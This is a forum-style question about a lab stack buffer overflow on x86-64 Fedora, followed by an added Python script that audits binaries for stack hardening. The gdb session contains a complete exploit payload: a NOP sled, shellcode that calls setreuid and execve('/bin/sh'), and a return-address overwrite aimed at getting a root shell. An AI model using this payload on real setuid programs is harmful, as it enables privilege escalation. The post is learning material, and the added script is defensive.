I am attempting a basic buffer overflow attack that spawns a root shell. I am facing the problem "Detaching after fork from child process ***". How do I get rid of this and spawn a root shell?
I am trying to spawn a root shell in my gdb as a normal user (obviously). I have compiled the vulnerable program in every possible way: I disabled ASLR... disabled DEP... compiled it with -fno-stack-protector
When I run it in my gdb, I get this ->
One more thing: the buffer size is 100, and the segmentation fault happens at 120!
60 bytes of \x90 + shellcode of size 50 + 10 "A"s (padding) + the overwritten address (8) = (60 + 50 + 10 = 120; 120 + overwritten address = 128)
[bhabi@localhost buffer]$ gdb -q bof
(gdb) r `perl -e 'print "\x90" x 60, "\x48\x31\xc0\x48\x83\xc0\x71\x48\x31\xff\x48\x31\xf6\x0f\x05\xeb\x13\x48\x31\xc0\x48\x83\xc0\x3b\x5f\x88\x67\x07\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x90", "A" x 10, "\x60\xe4\xff\xff\xff\x7f\x00\x00"'`
启动程序:
/home/bhabi/buffer/bof `perl -e 'print "\x90" x 60, "\x48\x31\xc0\x48\x83\xc0\x71\x48\x31\xff\x48\x31\xf6\x0f\x05\xeb\x13\x48\x31\xc0\x48\x83\xc0\x3b\x5f\x88\x67\x07\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x90", "A" x 10, "\x60\xe4\xff\xff\xff\x7f\x00\x00"'
process 7*** is executing new program: /bin/bash
Missing separate debuginfos, use: debuginfo-install glibc-2.14.90-24.fc16.9.x86_64
Detaching after fork from child process 7***.
Detaching after fork from child process 7***.
Detaching after fork from child process 7**.
[bhabi@localhost buffer]$
I was expecting [root@localhost buffer]$
I even tried
set follow-fork-mode child
set detach-on-fork off
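The post relies on three mitigations being switched off (ASLR, a non-executable stack, and the stack protector). As an added example that is not part of the original post, the following Python audits those settings from the defender's side: it parses the ELF64 program headers for PT_GNU_STACK, checks for the stack-protector runtime symbol, and reads the ASLR sysctl. It assumes a little-endian ELF64 target (x86_64, as in the question); the symbol check is a heuristic.

```python
import struct
import sys

PT_GNU_STACK = 0x6474E551   # program header that records the stack's required permissions
PF_X = 0x1                  # "executable" bit in p_flags

def gnu_stack_executable(elf: bytes):
    """True if PT_GNU_STACK requests an executable stack (what a -z execstack build
    produces), False if it marks the stack non-executable, None if the header is
    absent. Assumes a little-endian ELF64 image."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2:      # EI_CLASS 2 == 64-bit
        raise ValueError("not an ELF64 image")
    e_phoff, = struct.unpack_from("<Q", elf, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 54)
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return None

def has_stack_protector(elf: bytes) -> bool:
    """Heuristic: a binary built with -fstack-protector references __stack_chk_fail;
    one built with -fno-stack-protector normally does not."""
    return b"__stack_chk_fail" in elf

def aslr_level(proc_text: str) -> str:
    """Describe the contents of /proc/sys/kernel/randomize_va_space."""
    levels = {"0": "disabled", "1": "partial (no heap randomisation)", "2": "full"}
    return levels.get(proc_text.strip(), "unknown")

def audit(path: str) -> dict:
    """Collect the three hardening indicators for the binary at `path`."""
    with open(path, "rb") as f:
        elf = f.read()
    try:
        with open("/proc/sys/kernel/randomize_va_space") as f:
            aslr = aslr_level(f.read())
    except OSError:
        aslr = "unknown (sysctl not readable)"
    return {"executable_stack": gnu_stack_executable(elf),
            "stack_protector": has_stack_protector(elf),
            "aslr": aslr}

if __name__ == "__main__":
    for key, value in audit(sys.argv[1]).items():
        print(f"{key}: {value}")
```

Run it as `python3 audit.py ./bof`; a hardened build should report executable_stack False, stack_protector True and aslr full.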